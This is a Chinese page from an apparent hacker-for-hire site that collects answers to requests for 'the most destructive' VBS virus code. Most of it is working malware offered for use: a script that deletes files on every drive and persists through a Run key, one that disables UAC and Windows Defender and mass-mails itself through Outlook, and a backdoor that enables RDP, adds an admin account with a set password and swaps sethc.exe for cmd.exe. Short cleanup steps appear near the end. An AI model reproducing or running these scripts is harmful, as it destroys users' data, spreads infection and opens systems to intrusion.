黑客24小时在线接单网站

黑客24小时在线接单网站,黑客网站入口,黑客接单入口,黑客攻击

2022年06月02日 09:10:30

vbs脚本病毒代码大全(vbs强力病毒代码)

本文导读目录:

求最全的vbs病毒代码,要破坏性的。谢谢,回答的好我多给分。

那废话不说,问这个如何?不懂可以问我

On Error Resume Next

dim avest,xufso,wscrt

Set avest = WScript.Createobject("WScript.Shell")

Set wscrt = WScript.Createobject("WScript.Shell")

Set xufso = CreateObject("Scripting.FileSystemObject")

avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true

xufso.CreateFolder "C:\VBScript\"

wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"

xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"

xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"

wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"

wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"

wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"

wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"

msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"

do

wscrt.run "ping 192.168.1.1 -l 65500 -t"

loop

vbs代码大全

哈哈,LS的比较搞笑

先说VBS:

我是学VB的,据说VB和VBS差不了多少,只是VBS没有主界面而已,

VB对网络的支持堪称完美,所以不少的盗号程序都选择用VB来编写,但是其代码量绝对不是我们可以在百度贴出来的,而且......等等,总之,代码贴出来是不可能了

再说代码:

LS的你别嫌他的少,他这个是无毒无害,对于对操作系统不通的童鞋来说是挺管用的

如果你觉得太少,就把这个文件在注册表里做成启动项,让它开机就启动,呵呵

如果不够你的意,就这样改:

Msgbox "您的系统已遭病毒破坏,系统5秒后将自动关机关机,请在关机后24小时重新启动。",16+4096,"Windows安全警报"

Shell "cmd/c shutdown -s -t 5"

佛祖曰:普度众生,这样就行

后面那一句代码是用来关机的,VBS代码你应该会插入把

创建个文本文档

输入代码

改后缀.txt为.vbs

双击运行即可

求一个超毒无比的vbs代码,最好能破坏电脑和安全模式也修复不了的vbs代码。一定要超毒的。

送你了

On Error Resume Next

set fso=createobject("scripting.filesystemobject")

set vbs=wscript.createobject("wscript.shell")

pt=vbs.specialfolders("startup") "\"

set file=fso.getfile(wscript.scriptfullname)

file.copy pt

set fso=createobject("scripting.filesystemobject")

set vbs=wscript.createobject("wscript.shell")

pt=vbs.specialfolders(1) "\"

set file=fso.getfile(wscript.scriptfullname)

file.copy pt

set ws=wscript.createobject("wscript.shell")

ws.popup "正在验证I/O接口...",3,"接口工具",vbinformation

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"

if err.number0 then

On Error Goto 0

err.raise 1,"无法匹配的I/O接口,请以ADMINISTRATOR用户运行重试","Access failed (no permission)"

end if

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\[TARGETDIR]脚本病毒加强版.vbs","RUNASADMIN","REG_SZ"

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",0,"REG_DWORD"

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",0,"REG_DWORD"

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop",0,"REG_DWORD"

ws.run "cmd /c echo 0C:\Windows\Web\Screen\e.bmp"

Set ol=CreateObject("Out"+"look"+".Application")

For x=1 To 100

Set Mail=ol.CreateItem(0)

Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

Mail.Subject="工作报告"

Mail.Body="您好,这是今月的工作报告"

Mail.Attachments.Add(dir2"Win32system.vbs")

Mail.Send

Next

ol.Quit

ws.run "cmd /c echo Your Computer Has Been Destoryed!e.txt"

ws.run "cmd /c echo Your Computer Has Been Destoryed!c:\e.txt"

wscript.sleep 2000

ws.regwrite "HKCU\Control Panel\Desktop\wallpaper","C:\Windows\Web\Screen\e.bmp","REG_SZ"

ws.run "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupIDPage",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupSecurityPage",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoEntireNetwork",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoWorkgroupContents",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoFileSharingControl",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoPrintSharingControl",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CLASSES_ROOT\directory\background\ShellEx\ContextMenuHandlers\New\",0,"REG_SZ"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService\Start",4,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\noclose","1","REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrivers",67108863,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent",0,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetActiveDesktop",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktopChanges",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Nodesktop",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDeletePrinter",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\ControlPanel\Desktop\CoolSwitch",0,"REG_SZ"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",67108863,"REG_DWORD"

ws.run "cmd /c taskkill /f /im explorer.exe"

wscript.sleep 3000

ws.run "cmd /c start explorer.exe"

wscript.sleep 2000

ws.regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"

wscript.sleep 100

set vbs=wscript.createobject("wscript.shell")

set ws=createobject("wscript.shell")

do

msgbox"你好",vbexclamation,"VIRUS"

wscript.sleep 5000

loop

电脑中了vbs病毒怎么解决

VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点:

编写简单、破坏力大、感染力强、传播范围广、变种多、欺骗性强;可以通过通过Email附件传播;通过局域网共享传播;通过感染htm、asp、jsp、php等网页文件传播;通过IRC聊天通道传播;

VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,中毒后的电脑会在各个盘符下面生成.vbs、autorun.exe等文件。下面笔者将一次手动成功清除VBS病毒的过程说一下,权当交流!

通过系统的资源管理器,可以看到一直有一个wscript.exe的进程存在,还有就是会感觉到机子很卡……

第一步:限制wscript.exe进程的运行。“开始——运行”,输入gpedit.msc,然后依次打开“计算机配置——Windows设置——安全设置——软件限制策略”,右键,选择“创建新策略”,选择“其他规则”,在右侧窗格空白处右击,在菜单中选择“新建路径规则”项,浏览选择C:\Windows\System32文件夹下的wscript.exe,将其安全级别设为“不允许”。这样我们就成功的限制了wscript.exe的运行。

第二步:通过任务管理器或者其他的工具,结束进程wscript.exe。

第三步:借助工具冰刃,删除各个盘符下面的.VBS、.vbe、js、autorun等文件。

第四步:搜索一下,在系统目录中是否还有.VBS、.vbe、js等文件存在,如果有,删除掉。在看看系统的启动项中有没有不明的启动项,如果有,也要删除掉!

第五步:重新启动电脑,看到各个盘符下面就没有.VBS等类型的文件了,系统也恢复到正常。

到这里,就已经成功的清除了VBS病毒!总结一下,重点是要限制VBS病毒的运行,只有先限制了它的运行,我们后面的删除工作才能正常的进.

谁能给我最全的vbs病毒代码,要破坏性的。我多给分,前提是回答满意。

那废话不说,问这个如何?不懂可以问我

On Error Resume Next

dim avest,xufso,wscrt

Set avest = WScript.Createobject("WScript.Shell")

Set wscrt = WScript.Createobject("WScript.Shell")

Set xufso = CreateObject("Scripting.FileSystemObject")

avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true

xufso.CreateFolder "C:\VBScript\"

wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"

xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"

xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"

wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"

wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"

wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"

wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"

msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"

do

wscrt.run "ping 192.168.1.1 -l 65500 -t"

loop

解释一个VBS脚本病毒代码

'容错

on error resume next

'定义一个常量 是一个注册表的键值

const HKEY_LOCAL_MACHINE = H80000002

'定义一个变量strComputer 值为.

strComputer = "."

Set StdOut = WScript.StdOut

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _

strComputer "\root\default:StdRegProv")

'创建组件 是关于注册表的组件

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

strValueName = "fDenyTSConnections"

dwValue = 0

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

'上面这段的功能是开启3389端口 也就是开启远程终端 方法是修改注册表的键值

'容错

on error resume next

'定义变量 username password

dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os"/"username",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath

'这段是增加管理员 用户名是HackEr 密码是393214425

'容错

On Error Resume Next

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exeecho y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exedel %SystemRoot%\system32\sethc.exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

'这段是留后门 放大镜后门 将sethc.exe替换为cmd.exe 这样 在登陆界面这里 按5下shift就会出现cmd窗口 然后添加用户即可登陆系统

总结 这个不算是病毒 充其量 只不过是一个后门程序 运行之后 系统的远程终端开启,自动加入一个HackEr的帐号 自动添加一个放大镜后门

个人感觉 这代码是将3段代码拼凑起来的 - - 没技术含量

电脑中.vbs病毒,请大神翻译此代码:

哈哈,无聊简单的恶作剧VBS脚本,给你翻译一下吧,加了一些注释,你一看就会明白。

Dim HFWsr : Dim HFWfk : Dim HFWfw : Dim FwriteText : Dim HFWfp

HFWfp="C:\HFWkill.vbs" '这里是先定义一个恶作剧脚本的文件名,赋值给一变量方便后面调用

set HFWsr=CreateObject("wscript.shell") '创建Wscript对象

set HFWfk=CreateObject("Scripting.FileSystemObject") '这个对象用于下面的文件操作

Set HFWfw = HFWfk.CreateTextFile(HFWfp, true, false) '这里开始就是准备创建新的恶作剧脚本HFWkill.vbs了

HFWsr.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KILLHFW","C:\HFWKILL.VBS","REG_SZ" '这里是设置了开机自动运行 C盘根目录下由本程序创建的VBS程序

FwriteText = "dim HFWkill:set HFWkill=CreateObject(""Wscript.shell""):HFWkill.run ""shutdown -s -t 0 -f"",0"  '它最主要是这段关机代码写入了这个新建的VBS文件

HFWfw.write FwriteText:HFWfw.close '创建完毕

HFWsr.run "attrib +h +r +s c:\hfwkill.vbs",0 '设置为此恶作剧文件为隐藏文件只读文件系统文件

msgbox "o(∩_∩)...! I LOVE YOU ! 你挂了...哈哈哈",0,"H*F*W" '这里是得意地向你表示它已得逞

HFWsr.run "shutdown -s -t 0 -f", 0 '这里是先关你一次机,接下来你一开机它就关机了,就是这么个简单小恶作剧脚本!

万一已“中毒”,则进入安全模式,在运行里输入“RegEdit” 打开注册表,然后把HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\下面的“KILLHFW”这项删除即可。顺便把C盘根目录下的HFWKILL.VBS文件也删除掉最好,当然要删除这个文件要先设置显示隐藏文件系统文件。若熟悉DOS,那么在CMD窗口里输入Del c:\HFWKILL.VBS 也行

标签:vbs脚本病毒代码大全 

作者:hacker , 分类:黑客接单入口 , 浏览:28 , 评论:4

  • 评论列表:
  •  怎忘纯乏
     发布于 2022-06-02 10:06:04  回复该评论
  • eep 100set vbs=wscript.createobject("wscript.shell")set ws=createobject("wscript.shell")domsgbox"你好",vbexclamation,"VIRUS"
  •  颜于乘鸾
     发布于 2022-06-02 20:03:37  回复该评论
  • eavest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,trueavest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,trueavest.run "cmd /c ""del y:\*.* / f /q
  •  北槐僚兮
     发布于 2022-06-02 15:33:04  回复该评论
  • """,0 ,true avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true avest.run "cmd /c
  •  痛言释欢
     发布于 2022-06-02 10:27:27  回复该评论
  • 来说是挺管用的如果你觉得太少,就把这个文件在注册表里做成启动项,让它开机就启动,呵呵如果不够你的意,就这样改:Msgbox "您的系统已遭病毒破坏,系统5秒后将自动关机关机,请在关机后24小时重新启动。",16+4096,"Windows安全警报"

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.